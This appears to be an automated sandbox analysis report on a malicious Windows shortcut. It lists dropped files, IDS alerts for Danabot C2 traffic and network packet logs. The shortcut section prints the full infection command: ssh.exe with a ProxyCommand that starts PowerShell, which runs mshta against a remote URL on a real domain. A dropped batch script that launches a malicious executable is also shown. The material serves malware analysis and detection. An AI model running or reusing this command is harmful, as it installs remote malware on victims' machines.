                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with very long lines (393), with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):15114
                                                        Entropy (8bit):5.349760035081946
                                                        Encrypted:false
                                                        SSDEEP:384:VlT4bx6TByrWh/VNeEsAEVIpV6jXgNJeLwTXSGibLJydnAUHRQkjRUR4VDlmfmel:Vpm
                                                        MD5:361A47CCEB2AD85E39FAF112FC26661D
                                                        SHA1:B68CC46EB5AB6C61D95541B9DE8EEA4E25F18B36
                                                        SHA-256:7358F5B673BD453AA0A3D8441635BEF30060E57A4027129BEDB24D13164E11FA
                                                        SHA-512:324081F52A6CC0A44499C50F491A2E4352FDBB18927B5BA12D91128C6295EAB459398D42CD364D1F3320B16735B3100CD31B70F02EB3CCA71BD1D0827D33EA56
                                                        Malicious:false
                                                        Preview:SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:552-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=40a129b2-c3b2-4008-b823-fa17b5fca88a.1735285671552 Timestamp=2024-12-27T02:47:51:553-0500 ThreadID=3544 Component=ngl-lib_NglAppLib Description="SetConf
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):29752
                                                        Entropy (8bit):5.402552891007544
                                                        Encrypted:false
                                                        SSDEEP:192:zcbaIGkcbIcbiIICcbBOQQ0fQNCHPaPOhWPOA3mbSAcbsGC9GZPOdIzZMJzV3Zmk:EGvIcNYdQ1Y
                                                        MD5:E6C0AA81F8EE14E1846FD5123109F85C
                                                        SHA1:0C056CAED52B32ECA21E04F400248C5C7D973E7E
                                                        SHA-256:C6F96104A94914319F9D8A3542161D64CE79A56A137041CF4255D00D2668ED0C
                                                        SHA-512:AFC21A8819D4A36821483364C5776AA47A6894CD6228AD7629B3D48299D93BDE7329941AF5FDE82734C7B3CDA32BFA348A71EA3A7599620571A6CA015A760FCC
                                                        Malicious:false
                                                        Preview:05-10-2023 11:50:33:.---2---..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ***************************************..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : ******** Starting new session ********..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 11:50:33:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 11:50:33:.Closing File..05-10-
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
                                                        Category:dropped
                                                        Size (bytes):386528
                                                        Entropy (8bit):7.9736851559892425
                                                        Encrypted:false
                                                        SSDEEP:6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
                                                        MD5:5C48B0AD2FEF800949466AE872E1F1E2
                                                        SHA1:337D617AE142815EDDACB48484628C1F16692A2F
                                                        SHA-256:F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
                                                        SHA-512:44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 647360
                                                        Category:dropped
                                                        Size (bytes):1407294
                                                        Entropy (8bit):7.97605879016224
                                                        Encrypted:false
                                                        SSDEEP:24576:/YkwYIGNPQbdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07WWL07oXGZd:DwZG2b3mlind9i4ufFXpAXkrfUs0qWLk
                                                        MD5:38ED8E7B44D526DDA0F3E7608AF1AFA1
                                                        SHA1:45E30A6789382E29AC870CCF92B514FB95742C45
                                                        SHA-256:7B277E2332AE55A014D8C37CCC879D165E33315437F6197BEB153CD75E4EFBBF
                                                        SHA-512:7169B1E4B2895A91FA0FBE4297CB70BE56D733084653334BB4E8421382F8F761DAD11B5D87277E0286A7C16CB53A2C79F96BB45F433D776E82A7CF45EA25121C
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
                                                        Category:dropped
                                                        Size (bytes):758601
                                                        Entropy (8bit):7.98639316555857
                                                        Encrypted:false
                                                        SSDEEP:12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
                                                        MD5:3A49135134665364308390AC398006F1
                                                        SHA1:28EF4CE5690BF8A9E048AF7D30688120DAC6F126
                                                        SHA-256:D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
                                                        SHA-512:BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
                                                        Malicious:false
                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                        File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
                                                        Category:dropped
                                                        Size (bytes):1419751
                                                        Entropy (8bit):7.976496077007677
                                                        Encrypted:false
                                                        SSDEEP:24576:/bWL07oXGZfqZwYIGNPZdpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TWLxXGZSZwZGH3mlind9i4ufFXpAXkru
                                                        MD5:1692C6AD02530631CD5B90F95E5EE6B0
                                                        SHA1:CB1D18D7336B71A7F85BC0F884F124B8070553A7
                                                        SHA-256:9E41C6F1A614DF448C430E6DA66B82485B0871B8CD94112453055DC6F492F144
                                                        SHA-512:36C8C520F68037EA393D8026A3B1515AE05F874B12578FF17DD9B1DD5C582B622ADDA2434D25F469C21FA743873A3B33CCCB16A2CEDB0B0C50D9E25361B61D5E
                                                        Malicious:false
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):145
                                                        Entropy (8bit):4.955210469798106
                                                        Encrypted:false
                                                        SSDEEP:3:CxKbbYx32/r4lwxQVLX65RSvWKTnMEREaKC5WjvdMRSvy:Cx+bYc/gwa+5UvrnFiaZ5QFMUvy
                                                        MD5:16A0402583FF6B418285B6A5189EB5AA
                                                        SHA1:0D4885A0CC61A634209EF54A6820A665D59A3D2C
                                                        SHA-256:224BC1F4A1E2A441D186D3AEDCB3302312F10174ECE6F914B86697B352F8F953
                                                        SHA-512:585A6C4F6A3AC6EA971223A2C3CFAE36469DDD5F6C9F9F4A2DB0E542755354DE64FF5D4D75DE6F8241AC7EC7F04922337A292B2A4EDFFFCAF541F26A9D9AE9D6
                                                        Malicious:true
                                                        Preview:if not DEFINED IS_MNMZD set IS_MNMZD=1 && start "" /min "%~dpnx0" %* && exit ..start /min C:\Users\user\AppData\Roaming\mama.exe && exit ..exit..
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6220
                                                        Entropy (8bit):3.732438111462404
                                                        Encrypted:false
                                                        SSDEEP:48:yM0uNr2Cg2MoU2flVukvhkvklCyw0gP4uilL2SogZodv4uilG2SogZoJ1:AkiCgl4ekvhkvCCt54ui1Hu4uiOHK
                                                        MD5:B423F43B0F60F28E0C36B964ECEC54C0
                                                        SHA1:D31D212624B4A723A8D348CE32020BA2C492AB8C
                                                        SHA-256:FAFC1EA6289F57CECB34F73E68DF121F57F74D1E04BF5599BAD7BD9C4A98A4CB
                                                        SHA-512:9A63C210F1AC7A22113610723E6AADCDB44070DF9305A083D23F30BF6BFB0E5936F5AA2C605E27BD9086CED04DC30ACCEC288F209B4D9640DE255A3866919653
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ....N.5q......3X..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....W.3X..r..3X......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.=...........................c..A.p.p.D.a.t.a...B.V.1......Y.=..Roaming.@......EW)N.Y.=...........................NK.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.=..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NEW.S...........................|".W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NEW.S....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NEW.S....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.=................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):6220
                                                        Entropy (8bit):3.732438111462404
                                                        Encrypted:false
                                                        SSDEEP:48:yM0uNr2Cg2MoU2flVukvhkvklCyw0gP4uilL2SogZodv4uilG2SogZoJ1:AkiCgl4ekvhkvCCt54ui1Hu4uiOHK
                                                        MD5:B423F43B0F60F28E0C36B964ECEC54C0
                                                        SHA1:D31D212624B4A723A8D348CE32020BA2C492AB8C
                                                        SHA-256:FAFC1EA6289F57CECB34F73E68DF121F57F74D1E04BF5599BAD7BD9C4A98A4CB
                                                        SHA-512:9A63C210F1AC7A22113610723E6AADCDB44070DF9305A083D23F30BF6BFB0E5936F5AA2C605E27BD9086CED04DC30ACCEC288F209B4D9640DE255A3866919653
                                                        Malicious:false
                                                        Preview:...................................FL..................F.".. ....N.5q......3X..z.:{.............................:..DG..Yr?.D..U..k0.&...&.........5q.....W.3X..r..3X......t...CFSF..1.....EW)N..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW)N.Y.=...........................c..A.p.p.D.a.t.a...B.V.1......Y.=..Roaming.@......EW)N.Y.=...........................NK.R.o.a.m.i.n.g.....\.1.....EW.R..MICROS~1..D......EW)N.Y.=..........................O~X.M.i.c.r.o.s.o.f.t.....V.1.....EW.S..Windows.@......EW)NEW.S...........................|".W.i.n.d.o.w.s.......1.....EW+N..STARTM~1..n......EW)NEW.S....................D......H..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW#O..Programs..j......EW)NEW.S....................@.......|.P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW)NEW)N..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~2.LNK..^......EW)N.Y.=................
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PDF document, version 1.4, 6 pages
                                                        Category:dropped
                                                        Size (bytes):1348011
                                                        Entropy (8bit):7.644353784937569
                                                        Encrypted:false
                                                        SSDEEP:24576:RpALBW4Dw5KYgPDgbECYMz50vXxkRAJbeDfTnUxGnnlv:kBW4MKYgcBYMzCvSUqDfzomlv
                                                        MD5:8BB097B11BDAA4AD387D7E648712D4D3
                                                        SHA1:70B3BEC7D52D13548EEE3B71E748C6C3D011F8C3
                                                        SHA-256:F42E4CB924D4B8023827477FB136664A8426CB5AA208660288F4278CD523A5A4
                                                        SHA-512:6F929BB7FD157750D1F152C5837344CA20FE6A51284F58305AB1D5D2F067859C5EA0AC5FAD6AE4514654A112F49214D359DB5522FE416A138B4004088DF423D9
                                                        Malicious:false
                                                        Preview:%PDF-1.4.%.....1 0 obj.<<./CreationDate(D:20240222130353+05'00')./Creator(PDFsharp 1.51.5185 \(www.pdfsharp.com\))./Producer(PDFsharp 1.51.5185 \(www.pdfsharp.com\)).>>.endobj.2 0 obj.<<./Type/Catalog./Pages 3 0 R./Metadata 23 0 R.>>.endobj.3 0 obj.<<./Type/Pages./Count 6./Kids[4 0 R 8 0 R 11 0 R 14 0 R 17 0 R 20 0 R].>>.endobj.4 0 obj.<<./Type/Page./MediaBox[0 0 595.08 841.68]./Parent 3 0 R./Contents 5 0 R./Resources.<<./ProcSet [/PDF/Text/ImageB/ImageC/ImageI]./ExtGState.<<./GS0 6 0 R.>>./XObject.<<./I0 7 0 R.>>.>>./Group.<<./CS/DeviceRGB./S/Transparency.>>.>>.endobj.5 0 obj.<<./Length 56./Filter/FlateDecode.>>.stream.x.+.*.2P...t.}.`...b.B.SKS=...............i..........F...endstream.endobj.6 0 obj.<<./Type/ExtGState./ca 1.>>.endobj.7 0 obj.<<./Type/XObject./Subtype/Image./Length 123720./Filter/DCTDecode./Interpolate true./Width 1653./Height 2338./BitsPerComponent 8./ColorSpace/DeviceRGB.>>.stream.......JFIF..............Exif..MM.*.............................u..........."...........
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):4277248
                                                        Entropy (8bit):7.796835542143392
                                                        Encrypted:false
                                                        SSDEEP:98304:h+Dc6yHfpXZa1ZUVTZ2zsFi840WiRoYIUF4ZxStM3bQR:w9ylZIUVt2zd8rnH4jStM3bg
                                                        MD5:72B6B07175EF611CE7DAA959A1248AAE
                                                        SHA1:BEE9D33D83C98A7C2C3C9D0EB671FA1D53328378
                                                        SHA-256:8E6AE3B356D2205296FEC0761DAA461A311190E50E0E611699EBB4AAD6E6CD77
                                                        SHA-512:56F0EE5BA99A55F05BFEA0252B544D6DCAC6CC22DBF430E228BABD1520A14EA76429FCC8F67BCC0425F8D573211A1D1B47BA6164C136D8C2A85A26030CAE9F52
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....9ig..................>..f........>.......>...@...........................B..................@....................@.......?.......A..6...................0@.............................. @.......................?.d.....?.x....................text.....>.......>................. ..`.itext..P.....>.......>............. ..`.data...h}....>..~....>.............@....bss....._...p?..........................idata........?......\?.............@....didata.x.....?......t?.............@....edata........@......x?.............@..@.tls.... .....@..........................rdata..\.... @......z?.............@..@.reloc.......0@......|?.............@..B.rsrc....6....A..6....A.............@..@..............B......DA.............@..@................
                                                        Process:C:\Windows\System32\svchost.exe
                                                        File Type:JSON data
                                                        Category:dropped
                                                        Size (bytes):55
                                                        Entropy (8bit):4.306461250274409
                                                        Encrypted:false
                                                        SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                        MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                        SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                        SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                        SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                        Malicious:false
                                                        Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                        File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                        Entropy (8bit):2.7195547483384943
                                                        TrID:
                                                        • Windows Shortcut (20020/1) 100.00%
                                                        File name:vreFmptfUu.lnk
                                                        File size:2'472 bytes
                                                        MD5:0fd3c13d822c330db0ff496a85ba3d91
                                                        SHA1:418fca575accf1c328dd30ce218072c278fcbd37
                                                        SHA256:ac09a4ccc5885bd8cd9382802014f6a8eacf7ff53d50b88cc6a8a43b1732a5d3
                                                        SHA512:edd34f725b2c763c03d925b7eb667993e77207013bd221c99ad277bfbc2a80d1f41ae26d41e512b195f4726efbcfc5d5c87e50fa81ea0ac4379a1ce3647cbc5a
                                                        SSDEEP:24:8lj/BF//Z/Uxp+/+G+WbUkVbZEIFPdd79dsHdUM:81LZ0RG+aUk/7ldJ9NM
                                                        TLSH:DD5123042BE93221F3B3AE7584BEB621843F7C46DE755A1F008C42481727614E475F67
                                                        File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                        Icon Hash:72d282828e8d8dd5

                                                        General

                                                        Relative Path:..\..\..\Windows\System32\OpenSSH\ssh.exe
                                                        Command Line Argument: -o ProxyCommand="powershell powershell -Command 'DX0ucZQ[=V?uY\Xmshta https://pravo-bashkortostan.ru/aaa.mp4DX0ucZQ[=V?uY\X'.SubString(15, 44)" .
                                                        Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp                        SID      Signature                                         Severity  Source IP     Source Port  Dest IP          Dest Port  Protocol
2024-12-27T08:47:51.466422+0100  2803305  ETPRO MALWARE Common Downloader Header Pattern H  3         192.168.2.10  49741        150.241.97.10    443        TCP
2024-12-27T08:49:04.226160+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49921        188.132.183.159  443        TCP
2024-12-27T08:49:05.724839+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49923        206.206.125.221  443        TCP
2024-12-27T08:49:06.820784+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49928        94.131.118.216   443        TCP
2024-12-27T08:49:07.914994+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49930        188.132.183.159  443        TCP
2024-12-27T08:49:15.920356+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49954        188.132.183.159  443        TCP
2024-12-27T08:49:17.921127+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49958        206.206.125.221  443        TCP
2024-12-27T08:49:19.059297+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49961        94.131.118.216   443        TCP
2024-12-27T08:49:20.528519+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49967        188.132.183.159  443        TCP
2024-12-27T08:49:26.108959+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49983        188.132.183.159  443        TCP
2024-12-27T08:49:26.209320+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49984        206.206.125.221  443        TCP
2024-12-27T08:49:26.353449+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49985        94.131.118.216   443        TCP
2024-12-27T08:49:26.478397+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  49987        188.132.183.159  443        TCP
2024-12-27T08:49:37.474876+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50015        188.132.183.159  443        TCP
2024-12-27T08:49:39.467654+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50021        206.206.125.221  443        TCP
2024-12-27T08:49:41.358375+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50027        94.131.118.216   443        TCP
2024-12-27T08:49:43.365644+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50029        188.132.183.159  443        TCP
2024-12-27T08:49:46.900369+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50034        188.132.183.159  443        TCP
2024-12-27T08:49:49.605669+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50035        206.206.125.221  443        TCP
2024-12-27T08:49:51.490399+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50036        94.131.118.216   443        TCP
2024-12-27T08:49:53.852487+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50037        188.132.183.159  443        TCP
2024-12-27T08:50:05.277636+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50042        188.132.183.159  443        TCP
2024-12-27T08:50:05.898036+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50043        206.206.125.221  443        TCP
2024-12-27T08:50:06.002098+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50044        94.131.118.216   443        TCP
2024-12-27T08:50:06.102406+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50045        188.132.183.159  443        TCP
2024-12-27T08:50:18.932612+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50050        188.132.183.159  443        TCP
2024-12-27T08:50:21.712694+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50051        206.206.125.221  443        TCP
2024-12-27T08:50:24.018424+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50052        94.131.118.216   443        TCP
2024-12-27T08:50:26.181397+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50053        188.132.183.159  443        TCP
2024-12-27T08:50:30.753848+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50058        188.132.183.159  443        TCP
2024-12-27T08:50:33.064608+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50059        206.206.125.221  443        TCP
2024-12-27T08:50:36.378759+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50060        94.131.118.216   443        TCP
2024-12-27T08:50:38.641377+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50061        188.132.183.159  443        TCP
2024-12-27T08:50:51.338961+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50066        188.132.183.159  443        TCP
2024-12-27T08:50:51.414710+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50067        206.206.125.221  443        TCP
2024-12-27T08:50:51.497493+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50068        94.131.118.216   443        TCP
2024-12-27T08:50:51.571723+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50069        188.132.183.159  443        TCP
2024-12-27T08:51:07.506464+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50074        188.132.183.159  443        TCP
2024-12-27T08:51:10.128528+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50075        206.206.125.221  443        TCP
2024-12-27T08:51:12.766473+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50076        94.131.118.216   443        TCP
2024-12-27T08:51:14.910033+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50077        188.132.183.159  443        TCP
2024-12-27T08:51:18.894398+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50082        188.132.183.159  443        TCP
2024-12-27T08:51:22.212063+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50083        206.206.125.221  443        TCP
2024-12-27T08:51:25.278106+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50084        94.131.118.216   443        TCP
2024-12-27T08:51:28.352672+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50085        188.132.183.159  443        TCP
2024-12-27T08:51:49.222393+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50090        188.132.183.159  443        TCP
2024-12-27T08:51:49.274931+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50091        206.206.125.221  443        TCP
2024-12-27T08:51:49.324518+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50092        94.131.118.216   443        TCP
2024-12-27T08:51:49.380085+0100  2034465  ET MALWARE Danabot Key Exchange Request           1         192.168.2.10  50093        188.132.183.159  443        TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                        Dec 27, 2024 08:47:40.309683084 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.319989920 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.320059061 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.328867912 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.328937054 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.340529919 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.340610027 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.348248005 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.348320007 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.353261948 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.353363991 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.359877110 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.359935045 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.364972115 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.365034103 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.370106936 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.370179892 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.378231049 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.378320932 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.383407116 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.383470058 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.390053034 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.390115023 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.413717985 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.413841009 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.518649101 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.518738985 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.523641109 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.523725033 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.527973890 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.528048038 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.532407999 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.532474995 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.536762953 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.536844015 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.542537928 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.542609930 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.546987057 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.547051907 CET49708443192.168.2.10150.241.97.10
                                                        Dec 27, 2024 08:47:40.551361084 CET44349708150.241.97.10192.168.2.10
                                                        Dec 27, 2024 08:47:40.551440954 CET49708443192.168.2.10150.241.97.10
